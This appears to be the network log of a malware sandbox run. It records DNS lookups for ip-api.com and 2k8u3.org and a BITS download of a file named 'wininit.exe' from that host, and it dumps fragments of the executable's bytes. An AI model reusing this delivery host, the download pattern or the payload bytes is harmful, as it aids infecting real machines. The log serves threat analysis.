                                                                Dec 4, 2024 16:26:32.909884930 CET1.1.1.1192.168.2.50x24daNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                Dec 4, 2024 16:27:38.079389095 CET1.1.1.1192.168.2.50xf74fNo error (0)ddk.2k8u3.org116.122.95.113A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • 2k8u3.org
                                                                • ip-api.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549707104.21.80.1805688C:\Windows\System32\svchost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 4, 2024 16:25:55.135216951 CET143OUTHEAD /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:25:56.585395098 CET927INHTTP/1.1 200 OK
                                                                Date: Wed, 04 Dec 2024 15:25:56 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 77824
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: REVALIDATED
                                                                Accept-Ranges: bytes
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NxRqB9n4%2BOh%2Fp2ialRHE%2B8WpwmeqDTGNNJxqOk7K5OhW0wRgg8dMozHM5%2F1nVOzmuAKwCTdS%2FCLsWuPsgfrmkWPM7AqWY4nkXZGbwHVK26G9zwxxmZh9Fv2cM%2Bc%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8ecccfd96b388c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2034&rtt_var=1017&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=143&delivery_rate=0&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Dec 4, 2024 16:25:56.631896973 CET215OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=0-1119
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:25:56.955986023 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:25:56 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 1120
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 0
                                                                Content-Range: bytes 0-1119/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c9O%2FKMmIXAOXnb%2FgmDsogcFcluYZa9vGX6Hq4%2F1kgZTl6Y5BfhrOK0%2BUvGOUQiOXrR7YH9NcBOaUkILYI48C4lc01IlZhYltPVZ5UnfIvklcKGCYnMJU7TVyzX8%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8ecccfddf8708c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3247&min_rtt=2034&rtt_var=3190&sent=3&recv=5&lost=0&retrans=0&sent_bytes=927&recv_bytes=358&delivery_rate=124308&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab d3 36 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 24 01 00 00 0a 00 00 00 00 00 00 ae 43 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 43 01 00 57 00 00 00 00 60 01 00 46 06 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL6g$C `@ @TCW`F
                                                                Dec 4, 2024 16:25:56.956119061 CET839INData Raw: 00 00 00 00 00 00 00 00 80 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00
                                                                Data Ascii: H.text# $ `.rsrcF`&@@.reloc.@BCH
                                                                Dec 4, 2024 16:26:01.395486116 CET218OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=1120-1912
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:01.722651005 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:01 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 793
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 5
                                                                Content-Range: bytes 1120-1912/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvJEKcuLeYNTu%2FhTCeeVySI2YqXVobagfZCab1r1LZnGEstHHWSxERQnswNslnvB99n40y89P4Tq2%2Bx7mQdayBdWGc1XhXrGMleH%2BTjAv45N7eOKi0RWeW%2F8W6g%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8ecccffbbee78c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3097&min_rtt=2034&rtt_var=2693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3002&recv_bytes=576&delivery_rate=1427174&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 14 80 17 00 00 04 16 73 6e 00 00 0a 80 18 00 00 04 14 80 19 00 00 04 2a 22 28 61 00 00 06 2b 00 2a 3a 02 74 08 00 00 1b 28 5c 00 00 06 2b 00 2a 1a 72 c2 0d 00 70 2a 1a 20 31 32 0d 05 2a 1a 72 f4 0d 00 70 2a 1a 20 ef d7 cd 03 2a 1a 72 26 0e 00 70 2a 1a 72 58 0e 00 70 2a 1a 20 92 69 49 01 2a 1a 72 8a 0e 00 70 2a 1a 20 1a 42 ff 03 2a 1a 72 bc 0e 00 70 2a 1a 20 6a 79 41 04 2a 1a 72 ee 0e 00 70 2a 1a 72 20 0f 00 70 2a 1a 20 53 08 dd 04 2a 1a 72 52 0f 00 70 2a 1a 20 f0 df bf 01 2a 1a 72 84 0f 00 70 2a 1a 20 32 19 b8 02 2a 1a 72 b6 0f 00 70 2a 1a 20 41 23 a5 02 2a 1a 72 e8 0f 00 70 2a 1a 72 1a 10 00 70 2a 1a 72 4c 10 00 70 2a 1a 72 7e 10 00 70 2a 1a 72 b0 10 00 70 2a 1a 20 b7 4f 04 02 2a 1a 72 e2 10 00 70 2a 1a 20 d4 ed 9c 01 2a 1a 72 14 11 00 70 2a 1a 20 96 e0 3a 00 2a 1a 72 46 11 00 70 2a 1a 20 7e bf 48 02 2a 1a 72 78 11 00
                                                                Data Ascii: sn*"(a+*:t(\+*rp* 12*rp* *r&p*rXp* iI*rp* B*rp* jyA*rp*r p* S*rRp* *rp* 2*rp* A#*rp*rp*rLp*r~p*rp* O*rp* *rp* :*rFp* ~H*rx
                                                                Dec 4, 2024 16:26:01.722695112 CET516INData Raw: 70 2a 1a 20 cb f7 57 04 2a 1a 72 aa 11 00 70 2a 1a 20 98 67 84 01 2a 3a 02 28 2d 00 00 0a 28 93 00 00 06 2b 00 2a 3a 02 28 2d 00 00 0a 28 94 00 00 06 2b 00 2a 1a 72 e6 15 00 70 2a 1a 72 18 16 00 70 2a 1a 20 db 37 ae 04 2a 1a 72 4a 16 00 70 2a 1a
                                                                Data Ascii: p* W*rp* g*:(-(+*:(-(+*rp*rp* 7*rJp*r|p* *rp*rp* *rp* U*rDp*rvp* ~6*rp* x*rp* =l*rp*r>p* Zn*rpp*rp* eu*rp*rp* *
                                                                Dec 4, 2024 16:26:04.176188946 CET218OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=1913-2137
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:04.500376940 CET1188INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:04 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 225
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 8
                                                                Content-Range: bytes 1913-2137/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDg%2F46GEd1vvXwpgO%2BHcjeYwgv%2F3tLc7CJtGvSUPd0gP4LXI8GCqE5%2FJm85T%2BH2fu7hbXvUaUDgZHLzj5ZlWtY4ZyRhAaAScME1FWu48jwXcBgpPbGsFBTufJ%2FY%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd00d1b658c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2966&min_rtt=2034&rtt_var=2282&sent=7&recv=9&lost=0&retrans=0&sent_bytes=4754&recv_bytes=794&delivery_rate=1427174&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 2a 1a 72 e5 23 00 70 2a 1a 20 7f 7e ba 04 2a 1a 28 0d 01 00 06 2a 1a 72 17 24 00 70 2a 1a 20 9c 4c b7 03 2a 1a 72 49 24 00 70 2a 1a 72 7b 24 00 70 2a 1a 72 ad 24 00 70 2a 1a 72 df 24 00 70 2a 1a 72 11 25 00 70 2a 1a 20 25 6b 55 00 2a 1a 72 43 25 00 70 2a 62 7e 36 00 00 04 2c 10 7e 36 00 00 04 6f 56 01 00 0a 14 80 36 00 00 04 2a 1a 72 a4 28 00 70 2a 1a 72 d6 28 00 70 2a 1a 72 08 29 00 70 2a 1a 20 e2 84 8e 04 2a 1a 72 3a 29 00 70 2a 1a 20 65 14 6c 02 2a 1a 72 6c 29 00 70 2a 1a 20 8e 49 21 01 2a 1a 72 9e 29 00 70 2a 1a 20 20 11 03 04 2a 1a 72 d0 29 00 70 2a 1a 72 02 2a 00 70 2a 1a 72 34 2a 00 70 2a 1a 72 66 2a 00 70 2a 1a 20 ee 61 e3 01 2a 1a 72 98 2a 00 70 2a 1a 72 ca
                                                                Data Ascii: *r#p* ~*(*r$p* L*rI$p*r{$p*r$p*r$p*r%p* %kU*rC%p*b~6,~6oV6*r(p*r(p*r)p* *r:)p* el*rl)p* I!*r)p* *r)p*r*p*r4*p*rf*p* a*r*p*r
                                                                Dec 4, 2024 16:26:06.866328001 CET218OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=2138-2213
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:07.192107916 CET1037INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:07 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 76
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 11
                                                                Content-Range: bytes 2138-2213/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OFQG824vYUocHltlrRtK%2FhUsH36SUs%2FgEJiCtDZlDOWVMib2VzuuXuFBu2zVpyD7d9KJmocte7l9Ha5ANnmI7j5mTUWILd%2FSXxVyLJ6D3Xuu%2BE3oIeJCUF5cftI%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd01deeef8c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4935&min_rtt=2034&rtt_var=5649&sent=8&recv=11&lost=0&retrans=0&sent_bytes=5942&recv_bytes=1012&delivery_rate=1427174&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 2a 00 70 2a 1a 72 fc 2a 00 70 2a 1a 20 60 ee 9e 03 2a 1a 72 2e 2b 00 70 2a 1a 72 60 2b 00 70 2a 1a 72 92 2b 00 70 2a 1a 72 c4 2b 00 70 2a 1a 20 d5 95 5f 04 2a 1a 72 f6 2b 00 70 2a 1a 20 d6 d5 c9 02 2a 1a 72 28 2c 00 70 2a 1a 20
                                                                Data Ascii: *p*r*p* `*r.+p*r`+p*r+p*r+p* _*r+p* *r(,p*
                                                                Dec 4, 2024 16:26:13.505451918 CET218OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=2214-2340
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:13.834846020 CET1085INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:13 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 127
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 17
                                                                Content-Range: bytes 2214-2340/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0BsbySzHlK98BPMTR4%2BxKMDLhPFvmKexdE9XY9p%2BFxvPLjTs8TkErRLUeLE2nOJCYMIeAKVmyVDxvY6RX4zlia8eEbmOCPhu1fkh8bIciJAWtn9PQDloyC4DwXY%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd04769738c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6146&min_rtt=2034&rtt_var=6659&sent=9&recv=13&lost=0&retrans=0&sent_bytes=6979&recv_bytes=1230&delivery_rate=1427174&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 81 4f ff 04 2a 1a 72 5a 2c 00 70 2a 1a 72 8c 2c 00 70 2a 1a 20 e9 87 8e 03 2a 1a 72 be 2c 00 70 2a 1a 72 f0 2c 00 70 2a 1a 72 22 2d 00 70 2a 1a 20 4a fe 90 02 2a 1a 72 54 2d 00 70 2a 1a 20 61 82 5a 01 2a 1a 72 86 2d 00 70 2a 1a 72 b8 2d 00 70 2a 1a 20 0b 46 30 05 2a 1a 72 ea 2d 00 70 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 1e 00 00 0a 0a 2b 00 06 2a 00 13
                                                                Data Ascii: O*rZ,p*r,p* *r,p*r,p*r"-p* J*rT-p* aZ*r-p*r-p* F0*r-p*0~o+*
                                                                Dec 4, 2024 16:26:14.834525108 CET218OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=2341-3228
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:15.160729885 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:15 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 888
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 19
                                                                Content-Range: bytes 2341-3228/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqFSNNIQu%2FqB9LiClGuGVpukRWgZTsbKcr0vc77y5hbEl2UtPXNawV0%2BahKzTAdf1ih4ZrLvhg8GvJvBA7zBhsSeWWnEGGo7WwoKvhAJGEpB3YFRqJk0N2aj%2FdM%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd04fbb248c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6986&min_rtt=2034&rtt_var=6675&sent=10&recv=15&lost=0&retrans=0&sent_bytes=8064&recv_bytes=1448&delivery_rate=1427174&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 1f 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 20 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 21 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 22 00 00 0a 28 23 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 24 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 25 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 26 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 05 00 00 1b 2d 0a 28 01 00 00 2b 0a 2b 06 2b 04 02 0a 2b 00 06 2a 13 30 02 00 10 00 00 00 09 00 00 11 03 12 00 fe 15 05 00 00 1b 06 81 05 00 00 1b 2a 13 30 01 00 20 00 00 00 0a 00 00 11 7e 29 00 00 0a 8c 07 00
                                                                Data Ascii: 0~o+*0~o +*0~o!+*0("(#+*0($+*0(%+*0(&+*0-(++++*0*0 ~)
                                                                Dec 4, 2024 16:26:15.160865068 CET613INData Raw: 00 1b 2d 0a 28 02 00 00 2b 80 29 00 00 0a 7e 29 00 00 0a 0a 2b 00 06 2a 13 30 02 00 7a 00 00 00 00 00 00 00 72 be 02 00 70 80 06 00 00 04 72 f0 02 00 70 80 08 00 00 04 72 22 03 00 70 80 09 00 00 04 72 54 03 00 70 80 0a 00 00 04 19 80 0b 00 00 04
                                                                Data Ascii: -(+)~)+*0zrprpr"prTprprprprprNprpp(*rzp(+*0~ (,~((-~((-~((-
                                                                Dec 4, 2024 16:26:16.160763025 CET218OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=3229-4391
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:16.487793922 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:16 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 1163
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 20
                                                                Content-Range: bytes 3229-4391/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vyE7fqh9cS%2Fqj%2BKYu4%2FtN8ShRqhKM%2F66fXRRA87sqN3a2xlLkeUAmKtzaRp%2FzjKYSmppjG2Hjvu9AguGKuwgaMU7yTZOTJpORx%2BfdA558hjqWhfiq%2BuMBaxjcvg%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd0580caf8c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6373&min_rtt=2034&rtt_var=6232&sent=12&recv=17&lost=0&retrans=0&sent_bytes=9913&recv_bytes=1666&delivery_rate=1427174&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 0e 18 72 6a 05 00 70 a2 11 0e 19 06 a2 11 0e 1a 72 7a 05 00 70 a2 11 0e 28 40 00 00 0a 6f 41 00 00 0a 2b 44 11 09 1b 8d 32 00 00 01 13 0e 11 0e 16 72 7e 05 00 70 a2 11 0e 17 7e 0f 00 00 04 28 3f 00 00 0a a2 11 0e 18 72 6a 05 00 70 a2 11 0e 19 06 a2 11 0e 1a 72 7a 05 00 70 a2 11 0e 28 40 00 00 0a 6f 41 00 00 0a 11 09 28 42 00 00 0a 13 08 11 08 6f 43 00 00 0a de 0f 25 28 2f 00 00 0a 13 0a 28 31 00 00 0a de 00 28 08 00 00 06 6f 44 00 00 0a 6f 45 00 00 0a 72 c2 05 00 70 17 6f 46 00 00 0a 7e 0f 00 00 04 28 3f 00 00 0a 06 6f 47 00 00 0a de 0f 25 28 2f 00 00 0a 13 0b 28 31 00 00 0a de 00 1d 28 48 00 00 0a 72 f0 04 00 70 7e 0f 00 00 04 28 3f 00 00 0a 72 1e 06 00 70 28 49 00 00 0a 13 0c 72 28 06 00 70 72 44 06 00 70 28 4a 00 00 0a 14 72 46 06 00 70 17 8d 03 00 00 01 13 0f 11 0f 16 11 0c a2 11 0f
                                                                Data Ascii: rjprzp(@oA+D2r~p~(?rjprzp(@oA(BoC%(/(1(oDoErpoF~(?oG%(/(1(Hrp~(?rp(Ir(prDp(JrFp
                                                                Dec 4, 2024 16:26:16.488030910 CET897INData Raw: 13 10 11 10 14 14 17 8d 43 00 00 01 13 11 11 11 16 17 9c 11 11 28 4b 00 00 0a 11 11 16 90 2c 1f 11 10 16 9a 28 22 00 00 0a d0 32 00 00 01 28 25 00 00 0a 28 4c 00 00 0a 74 32 00 00 01 13 0c 13 12 11 12 14 72 64 06 00 70 17 8d 03 00 00 01 13 13 11
                                                                Data Ascii: C(K,("2(%(Lt2rdp(MrzprDp(Mrp(N&sO+%(/(1(((0sPsQoR(V(>,(1
                                                                Dec 4, 2024 16:26:17.504229069 CET218OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=4392-5869
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:17.830887079 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:17 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 1478
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 21
                                                                Content-Range: bytes 4392-5869/77824
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2WhLojyFA1w%2FyW1qOrmA%2BecaUWbsdRVLgCYZkk4o5DimqdN%2Bmr2jbSxYZUIobggnMMd9JfJp7P6Rum7KfbLWSGk5sWrpnEi2bBTRDyLXCIgwlCZftyVA7tXR4M%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8eccd0606ef88c9c-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5830&min_rtt=2030&rtt_var=5760&sent=14&recv=19&lost=0&retrans=0&sent_bytes=12046&recv_bytes=1884&delivery_rate=1438423&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 03 00 00 01 13 06 11 06 16 72 62 08 00 70 a2 11 06 14 28 64 00 00 0a 6f 26 00 00 0a 6f 60 00 00 0a 13 04 11 04 72 7c 08 00 70 16 28 65 00 00 0a 16 33 32 08 17 8d 03 00 00 01 13 06 11 06 16 72 a8 08 00 70 a2 11 06 14 28 64 00 00 0a 6f 26 00 00 0a 6f 66 00 00 0a 72 b4 08 00 70 6f 5d 00 00 0a 2c 02 2b 0e 11 04 72 c4 08 00 70 6f 5d 00 00 0a 2c 02 2b 2d 08 17 8d 03 00 00 01 13 07 11 07 16 72 a8 08 00 70 a2 11 07 14 28 64 00 00 0a 6f 26 00 00 0a 72 d2 08 00 70 16 28 65 00 00 0a 16 33 04 17 0a de 58 11 05 6f 67 00 00 0a 3a 3e ff ff ff de 16 11 05 75 4e 00 00 01 2c 0c 11 05 75 4e 00 00 01 6f 68 00 00 0a dc de 0f 09 2c 0b 09 74 4e 00 00 01 6f 68 00 00 0a dc de 0f 07 2c 0b 07 74 4e 00 00 01 6f 68 00 00 0a dc de 0c 28 2f 00 00 0a 28 31 00 00 0a de 00 16 0a 2b 00 06 2a 41 64 00 00 02 00 00 00 26 00 00 00 d6 00 00 00 fc
                                                                Data Ascii: rbp(do&o`r|p(e32rp(do&ofrpo],+rpo],+-rp(do&rp(e3Xog:>uN,uNoh,tNoh,tNoh(/(1+*Ad&
                                                                Dec 4, 2024 16:26:17.830923080 CET1205INData Raw: 00 00 00 16 00 00 00 00 00 00 00 02 00 00 00 26 00 00 00 ee 00 00 00 14 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 0b 00 00 00 1a 01 00 00 25 01 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 01 00 00 36 01 00 00 0c 00 00 00 33 00 00
                                                                Data Ascii: &%66301(Voi(/&(/(1(1*308rp(.(j.+(/(1(1*!!
                                                                Dec 4, 2024 16:26:18.847929001 CET218OUTGET /wininit.exe HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: */*
                                                                Accept-Encoding: identity
                                                                If-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMT
                                                                Range: bytes=5870-7427
                                                                User-Agent: Microsoft BITS/7.8
                                                                Host: 2k8u3.org
                                                                Dec 4, 2024 16:26:19.174348116 CET1236INHTTP/1.1 206 Partial Content
                                                                Date: Wed, 04 Dec 2024 15:26:19 GMT
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 1558
                                                                Connection: keep-alive
                                                                Last-Modified: Fri, 15 Nov 2024 04:53:00 GMT
                                                                ETag: "13000-626ec575b4300"
                                                                Cache-Control: max-age=120
                                                                CF-Cache-Status: HIT
                                                                Age: 23
                                                                Content-Range: bytes 5870-7427/77824
